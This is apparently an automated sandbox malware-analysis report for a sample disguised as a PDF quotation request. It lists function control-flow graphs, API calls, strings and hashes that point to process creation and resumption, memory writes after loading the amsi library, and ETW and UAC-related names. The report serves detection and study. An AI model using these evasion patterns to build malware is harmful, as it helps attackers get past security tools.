                                                                  control_flow_graph 5348 2977878-2977c67 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 2954898 5463 2978af1-2978c74 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 2954898 5348->5463 5464 2977c6d-2977e40 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 2954798 call 295494c call 2954d20 call 2954d9c CreateProcessAsUserW 5348->5464 5553 2979420-297aa25 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 29546a4 * 2 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 * 16 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 29546a4 * 2 call 2968824 call 2967b98 call 296818c call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 ExitProcess 5463->5553 5554 2978c7a-2978c89 call 2954898 5463->5554 5572 2977e42-2977eb9 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 5464->5572 5573 2977ebe-2977fc9 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 5464->5573 5554->5553 5564 2978c8f-2978f62 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 296e540 call 295480c call 295494c call 29546a4 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 2957e18 5554->5564 5822 297921a-297941b call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 29549a4 call 2968bb0 5564->5822 5823 2978f68-2979215 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 2954d8c * 2 call 2954734 call 296dacc 5564->5823 5572->5573 5672 2977fd0-29782f0 call 29549a4 call 296dc90 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 296cfa4 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 5573->5672 5673 2977fcb-2977fce 5573->5673 5991 29782f2-2978304 call 2968584 5672->5991 5992 2978309-2978aec call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 ResumeThread call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 CloseHandle call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 2967ed4 call 29687a0 * 6 CloseHandle call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 5672->5992 5673->5672 5822->5553 5823->5822 5991->5992 5992->5463
                                                                  APIs
                                                                    • Part of subcall function 02968824: LoadLibraryA.KERNEL32(00000000,00000000,0296890B), ref: 02968858
                                                                    • Part of subcall function 02968824: FreeLibrary.KERNEL32(74B30000,00000000,029B1388,Function_000065D8,00000004,029B1398,029B1388,05F5E0FF,00000040,029B139C,74B30000,00000000,00000000,00000000,00000000,0296890B), ref: 029688EB
                                                                  • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02AA57DC,02AA5820,OpenSession,029B137C,0297AFD8,UacScan,029B137C), ref: 02977E39
                                                                  • ResumeThread.KERNEL32(00000000,ScanBuffer,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8,UacScan,029B137C,0297AFD8,ScanBuffer,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8), ref: 02978483
                                                                  • CloseHandle.KERNEL32(00000000,ScanBuffer,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8,UacScan,029B137C,0297AFD8,00000000,ScanBuffer,029B137C,0297AFD8,OpenSession,029B137C), ref: 02978602
                                                                    • Part of subcall function 029687A0: LoadLibraryW.KERNEL32(bcrypt,?,00000868,00000000,029B13A4,0296A3C7,ScanString,029B13A4,0296A77C,ScanBuffer,029B13A4,0296A77C,Initialize,029B13A4,0296A77C,UacScan), ref: 029687B4
                                                                    • Part of subcall function 029687A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029687CE
                                                                    • Part of subcall function 029687A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000868,00000000,029B13A4,0296A3C7,ScanString,029B13A4,0296A77C,ScanBuffer,029B13A4,0296A77C,Initialize), ref: 0296880A
                                                                  • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,029B137C,0297AFD8,UacInitialize,029B137C,0297AFD8,ScanBuffer,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8,UacScan,029B137C), ref: 029789F4
                                                                    • Part of subcall function 02957E18: GetFileAttributesA.KERNEL32(00000000,?,0296F8CC,ScanString,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8,ScanString,029B137C,0297AFD8,UacScan,029B137C,0297AFD8,UacInitialize), ref: 02957E23
                                                                    • Part of subcall function 0296DACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,0296DB9E), ref: 0296DB0B
                                                                    • Part of subcall function 0296DACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0296DB45
                                                                    • Part of subcall function 0296DACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0296DB72
                                                                    • Part of subcall function 0296DACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0296DB7B
                                                                    • Part of subcall function 0296818C: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02968216), ref: 029681F8
                                                                  • ExitProcess.KERNEL32(00000000,OpenSession,029B137C,0297AFD8,ScanBuffer,029B137C,0297AFD8,Initialize,029B137C,0297AFD8,00000000,00000000,00000000,ScanString,029B137C,0297AFD8), ref: 0297AA25
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Library$CloseFile$CreateFreeHandleLoadProcess$AddressAttributesCacheExitFlushInstructionProcResumeThreadUserWrite
                                                                  • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                  • API String ID: 1548959583-1225450241
                                                                  • Opcode ID: 6d1d65686406e066f05fbb50d073b8c559390a68c0f086447bb478962cd7345e
                                                                  • Instruction ID: 25e6c41592e64a9ddadad36808217a3f36e728fa98fd33dbdd666589af868977
                                                                  • Opcode Fuzzy Hash: 6d1d65686406e066f05fbb50d073b8c559390a68c0f086447bb478962cd7345e
                                                                  • Instruction Fuzzy Hash: 7043D875B102688BDB61EF64DD909EE73F6FFC8314F1050E6E409AB254DA30AE859F90
                                                                  Function 02951724 Relevance: 13.8, APIs: 7, Strings: 2, Instructions: 289sleepCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 8535 2951724-2951736 8536 295173c-295174c 8535->8536 8537 2951968-295196d 8535->8537 8538 29517a4-29517ad 8536->8538 8539 295174e-295175b 8536->8539 8540 2951a80-2951a83 8537->8540 8541 2951973-2951984 8537->8541 8538->8539 8548 29517af-29517bb 8538->8548 8544 2951774-2951780 8539->8544 8545 295175d-295176a 8539->8545 8542 2951684-29516ad VirtualAlloc 8540->8542 8543 2951a89-2951a8b 8540->8543 8546 2951986-29519a2 8541->8546 8547 2951938-2951945 8541->8547 8549 29516df-29516e5 8542->8549 8550 29516af-29516dc call 2951644 8542->8550 8554 29517f0-29517f9 8544->8554 8555 2951782-2951790 8544->8555 8551 2951794-29517a1 8545->8551 8552 295176c-2951770 8545->8552 8556 29519a4-29519ac 8546->8556 8557 29519b0-29519bf 8546->8557 8547->8546 8553 2951947-295195b Sleep 8547->8553 8548->8539 8558 29517bd-29517c9 8548->8558 8550->8549 8553->8546 8565 295195d-2951964 Sleep 8553->8565 8563 295182c-2951836 8554->8563 8564 29517fb-2951808 8554->8564 8566 2951a0c-2951a22 8556->8566 8559 29519c1-29519d5 8557->8559 8560 29519d8-29519e0 8557->8560 8558->8539 8561 29517cb-29517de Sleep 8558->8561 8559->8566 8568 29519e2-29519fa 8560->8568 8569 29519fc-29519fe call 29515cc 8560->8569 8561->8539 8567 29517e4-29517eb Sleep 8561->8567 8572 29518a8-29518b4 8563->8572 8573 2951838-2951863 8563->8573 8564->8563 8571 295180a-295181e Sleep 8564->8571 8565->8547 8574 2951a24-2951a32 8566->8574 8575 2951a3b-2951a47 8566->8575 8567->8538 8576 2951a03-2951a0b 8568->8576 8569->8576 8571->8563 8578 2951820-2951827 Sleep 8571->8578 8584 29518b6-29518c8 8572->8584 8585 29518dc-29518eb call 29515cc 8572->8585 8579 2951865-2951873 8573->8579 8580 295187c-295188a 8573->8580 8574->8575 8581 2951a34 8574->8581 8582 2951a49-2951a5c 8575->8582 8583 2951a68 8575->8583 8578->8564 8579->8580 8589 2951875 8579->8589 8590 295188c-29518a6 call 2951500 8580->8590 8591 29518f8 8580->8591 8581->8575 8592 2951a6d-2951a7f 8582->8592 8593 2951a5e-2951a63 call 2951500 8582->8593 8583->8592 8586 29518cc-29518da 8584->8586 8587 29518ca 8584->8587 8594 29518fd-2951936 8585->8594 8598 29518ed-29518f7 8585->8598 8586->8594 8587->8586 8589->8580 8590->8594 8591->8594 8593->8592
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000000,?,02952000), ref: 029517D0
                                                                  • Sleep.KERNEL32(0000000A,00000000,?,02952000), ref: 029517E6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID: " $0`
                                                                  • API String ID: 3472027048-882542589
                                                                  • Opcode ID: 1c135ebe10300abb391485aebd8d18c1cf8e436b99e592c65ce83e3a38b8fb4f
                                                                  • Instruction ID: 6151d1dcc000b0983bd9a4d559ef48f0b548b6cd94e73f8f8fe6e490f675a6b9
                                                                  • Opcode Fuzzy Hash: 1c135ebe10300abb391485aebd8d18c1cf8e436b99e592c65ce83e3a38b8fb4f
                                                                  • Instruction Fuzzy Hash: 54B1F376B053618BDB15CF28E884366BBE1EF85314F188ABAD98D8B385D770A451CB90
                                                                  Function 02951A8C Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 175sleepCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 10477 2951a8c-2951a9b 10478 2951aa1-2951aa5 10477->10478 10479 2951b6c-2951b6f 10477->10479 10480 2951aa7-2951aae 10478->10480 10481 2951b08-2951b11 10478->10481 10482 2951b75-2951b7f 10479->10482 10483 2951c5c-2951c60 10479->10483 10486 2951ab0-2951abb 10480->10486 10487 2951adc-2951ade 10480->10487 10481->10480 10490 2951b13-2951b27 Sleep 10481->10490 10484 2951b81-2951b8d 10482->10484 10485 2951b3c-2951b49 10482->10485 10488 2951c66-2951c6b 10483->10488 10489 29516e8-295170b call 2951644 VirtualFree 10483->10489 10492 2951bc4-2951bd2 10484->10492 10493 2951b8f-2951b92 10484->10493 10485->10484 10499 2951b4b-2951b5f Sleep 10485->10499 10494 2951ac4-2951ad9 10486->10494 10495 2951abd-2951ac2 10486->10495 10496 2951ae0-2951af1 10487->10496 10497 2951af3 10487->10497 10505 2951716 10489->10505 10506 295170d-2951714 10489->10506 10490->10480 10498 2951b2d-2951b38 Sleep 10490->10498 10501 2951b96-2951b9a 10492->10501 10503 2951bd4-2951bd9 call 29514c0 10492->10503 10493->10501 10496->10497 10502 2951af6-2951b03 10496->10502 10497->10502 10498->10481 10499->10484 10504 2951b61-2951b68 Sleep 10499->10504 10507 2951bdc-2951be9 10501->10507 10508 2951b9c-2951ba2 10501->10508 10502->10482 10503->10501 10504->10485 10510 2951719-2951723 10505->10510 10506->10510 10507->10508 10514 2951beb-2951bf2 call 29514c0 10507->10514 10511 2951bf4-2951bfe 10508->10511 10512 2951ba4-2951bc2 call 2951500 10508->10512 10515 2951c00-2951c28 VirtualFree 10511->10515 10516 2951c2c-2951c59 call 2951560 10511->10516 10514->10508
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000000,?), ref: 02951B17
                                                                  • Sleep.KERNEL32(0000000A,00000000,?), ref: 02951B31
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID: 0`
                                                                  • API String ID: 3472027048-3339448193
                                                                  • Opcode ID: 73d3cf3fb79326c2f7fdf8313f0b24116f61590ee1fa4c361af7452b6f4fddd8
                                                                  • Instruction ID: 5d6578958f171b98a8b7f78ac8c81cdce120d245e789491de90f9620931c87d0
                                                                  • Opcode Fuzzy Hash: 73d3cf3fb79326c2f7fdf8313f0b24116f61590ee1fa4c361af7452b6f4fddd8
                                                                  • Instruction Fuzzy Hash: 3451D071B053608FE715CF68C984766BBD4AF85318F1889AEEC4CCB296E770D845CB91
                                                                  Function 0296870C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(amsi), ref: 02968715
                                                                    • Part of subcall function 029680C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02968150,?,?,00000000,00000000,?,02968069,00000000,KernelBASE,00000000,00000000,02968090), ref: 02968115
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0296811B
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(?,?), ref: 0296812D
                                                                    • Part of subcall function 02967D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02967D74
                                                                  • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02968774
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                  • String ID: DllGetClassObject$W$amsi
                                                                  • API String ID: 941070894-2671292670
                                                                  • Opcode ID: 2b054eedae0d6d33e86ca68dcf4fc011e504a6202507c9511debb8a33aedb8ad
                                                                  • Instruction ID: 202dca58332b8293a8a1d9a5bd1b9164fdcbe93f457045a18b4457c91ab68617
                                                                  • Opcode Fuzzy Hash: 2b054eedae0d6d33e86ca68dcf4fc011e504a6202507c9511debb8a33aedb8ad
                                                                  • Instruction Fuzzy Hash: F2F0A45014C38179E201E6B48C49F5FBECD4BD2224F448F5CF1E8562D2D675D1058767
                                                                  Function 0296E2F6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0296E436
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: CheckConnectionInternet
                                                                  • String ID: Initialize$OpenSession$ScanBuffer
                                                                  • API String ID: 3847983778-3852638603
                                                                  • Opcode ID: a35d9d3829494dfa0340f7602f0bd70010be48af821cae36d11615b3b96d2afe
                                                                  • Instruction ID: dc6531afabb4911c545c3b29fa05a42f28a4288415c8ab0f6157ebba6474aba8
                                                                  • Opcode Fuzzy Hash: a35d9d3829494dfa0340f7602f0bd70010be48af821cae36d11615b3b96d2afe
                                                                  • Instruction Fuzzy Hash: 03413F35B502189BEB50EFB4C851EAEB3FAFFCC710F215421E485A7640DA74AD458FA0
                                                                  Function 0296840E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02968090,?,?,00000000,?,02967A06,ntdll,00000000,00000000,02967A4B,?,?,00000000), ref: 0296805E
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNELBASE(?), ref: 02968072
                                                                    • Part of subcall function 029680C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02968150,?,?,00000000,00000000,?,02968069,00000000,KernelBASE,00000000,00000000,02968090), ref: 02968115
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0296811B
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(?,?), ref: 0296812D
                                                                  • WinExec.KERNEL32(?,?), ref: 02968478
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
